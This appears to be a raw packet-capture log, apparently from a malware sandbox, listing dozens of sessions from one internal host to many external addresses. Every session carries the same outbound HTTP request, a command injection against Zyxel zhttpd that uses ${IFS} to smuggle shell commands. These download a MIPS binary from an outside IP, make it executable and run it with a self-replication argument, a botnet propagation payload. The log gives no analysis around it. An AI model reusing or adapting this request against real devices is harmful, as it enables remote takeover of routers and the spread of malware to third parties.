                                    Jan 13, 2024 19:02:44.421427965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6881192.168.2.1348284194.206.138.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421494007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6882192.168.2.1335030217.124.27.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421549082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6883192.168.2.1342012187.107.112.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421595097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6884192.168.2.1342110131.161.27.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421650887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6885192.168.2.133553477.245.184.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421684027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6886192.168.2.1337312166.192.232.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421753883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6887192.168.2.133849461.118.129.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421797037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6888192.168.2.1335686196.60.63.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421838045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6889192.168.2.1347674203.55.90.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421905041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6890192.168.2.133536460.43.168.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421956062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6891192.168.2.1351316198.12.36.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422008991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6892192.168.2.134689458.72.108.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422054052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6893192.168.2.1359952144.15.218.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422106028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6894192.168.2.1340140173.13.143.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422174931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6895192.168.2.1353240196.217.142.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422240973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6896192.168.2.134071224.189.0.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422280073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6897192.168.2.135783489.73.228.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422346115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6898192.168.2.135891463.144.136.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422374964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6899192.168.2.1352866198.187.79.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422449112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6900192.168.2.1346790141.179.71.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422524929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6901192.168.2.1339488169.69.111.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422561884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6902192.168.2.133604825.152.246.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422615051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6903192.168.2.1354932162.28.75.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422669888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6904192.168.2.1335694188.237.55.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422738075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6905192.168.2.134524889.66.40.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422799110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6906192.168.2.135133681.78.146.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422831059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6907192.168.2.134830457.179.70.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422878027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6908192.168.2.1356888212.172.186.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422935009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6909192.168.2.135633692.122.219.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.422986031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6910192.168.2.133391818.22.182.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423033953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6911192.168.2.133892223.97.3.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423089027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6912192.168.2.1337690194.210.195.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423147917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6913192.168.2.1353146208.231.244.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423209906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6914192.168.2.134076671.40.38.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423254967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6915192.168.2.134985850.248.125.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423309088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6916192.168.2.133300053.168.155.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423368931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6917192.168.2.134057653.39.171.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423415899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6918192.168.2.133836234.127.179.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423481941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6919192.168.2.1340606162.31.158.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423516989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6920192.168.2.1353060141.115.61.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423582077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6921192.168.2.134169079.115.2.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423645973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6922192.168.2.1358936166.44.244.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423715115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6923192.168.2.1344430105.17.20.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423749924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6924192.168.2.1344708111.71.225.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423787117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6925192.168.2.1359262101.46.204.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423832893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6926192.168.2.1350068163.138.221.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423906088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6927192.168.2.1339620121.68.32.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.423959017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6928192.168.2.1350086192.117.239.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424016953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6929192.168.2.1335668155.52.189.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424089909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6930192.168.2.1333280194.227.230.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424125910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6931192.168.2.133987498.7.201.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424201965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6932192.168.2.1358178116.65.108.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424242973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6933192.168.2.1355570195.137.19.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424284935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6934192.168.2.1336094222.120.214.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424326897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6935192.168.2.1342384213.217.201.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424387932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6936192.168.2.1335464200.215.75.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424482107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6937192.168.2.1355326156.236.168.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424483061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6938192.168.2.1349900118.65.97.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424531937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6939192.168.2.1345936189.2.213.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424573898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6940192.168.2.1333994154.1.200.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424626112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6941192.168.2.1343112150.141.43.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424674034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6942192.168.2.133992414.240.100.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424746037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6943192.168.2.1340490188.212.87.3443
                                    TimestampBytes transferredDirectionData
